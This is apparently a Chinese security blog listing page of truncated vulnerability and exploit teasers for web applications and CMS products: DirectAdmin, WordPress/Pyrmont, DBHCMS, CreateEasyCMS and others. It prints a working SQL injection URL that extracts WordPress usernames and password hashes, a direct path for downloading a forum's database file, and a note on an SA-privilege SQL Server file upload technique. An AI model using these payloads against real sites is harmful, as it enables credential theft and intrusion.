DirectAdmin v1.34.0 XSRF Create Administrator Vulnerability 


view sourceprint?# Vendor: [http://www.directadmin.com/]  

阅读全文……

本来想给论坛加个上传附件的功能，从官方网站下了个pun_attachment，顺便看了下代码，结果发现了这个漏洞:p

if (isset($_GET['secure_str']))
{
    if (preg_match('~(\d+)f(\d+)~', $_GET['secure_str'], $match))

阅读全文……

vCard PRO 3.1 Cross Site Scripting Vulnerability

# Exploit  :  

|  

阅读全文……

DBHCMS - Web Content Management System v1.1.4 RFI Vulnerability 


# Exploit:   

阅读全文……

创易网站管理系统CreateEasyCMS 0day
影响版本 1.0 sp1
存在问题的文件User\User_ChkInfo.asp 看这几句代码：

view plaincopy to clipboardprint?

阅读全文……

8pixel.net 
http://[target].com/[path]/App_Data/sb.mdb 


Toast Forums v1.8

阅读全文……

WordPress and Pyrmont V2. SQL Injection Vulnerability

# Exploit:   

http://server/path/results.php?id=-9999+union+select+1,concat_ws(0x3a,user_login,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+wp_users  

阅读全文……

Sa-Upfile 1.0(sa权限上传文件)

使用环境:SQL2000，SA权限，常用提权扩展存在。

原理 ：利用textcopy进行二进制导入导出。

阅读全文……

phpFaber CMS - XSS Vulnerability 

 [x] Exploit :  

#  

阅读全文……

# Title: Savant Web Server 3.1 Remote Buffer Overflow Exploit 
# EDB-ID: 10434 
# CVE-ID: () 
# OSVDB-ID: () 
# Author: DouBle_Zer0 

阅读全文……

影响版本：3.7 至3.9通杀

漏洞描述：

我近来看见许多blog友人叫我多发这类漏洞文章，我今天在发一篇，我在站长之家发现这个无前台的程序，所以我下下来看看这程序安全性如何，而且这程序下载地人也较多，在站长之家的下载量达”讯时网站管理系统CMS下载地址(已被下载71216次) “我在http://down.chinaz.com/soft/14523.htm下载了这程序，在站长之家里面这程序是最新地，因为无前台，所以我直接跳到admin网站后台目录看代码，这套程序在安全性还是可以地，只是可能程序员疏忽所以出现问题了，我们来看admin目录下的admin_conn.asp 文件，这文件代码很简单就几句话，我们来看源码

阅读全文……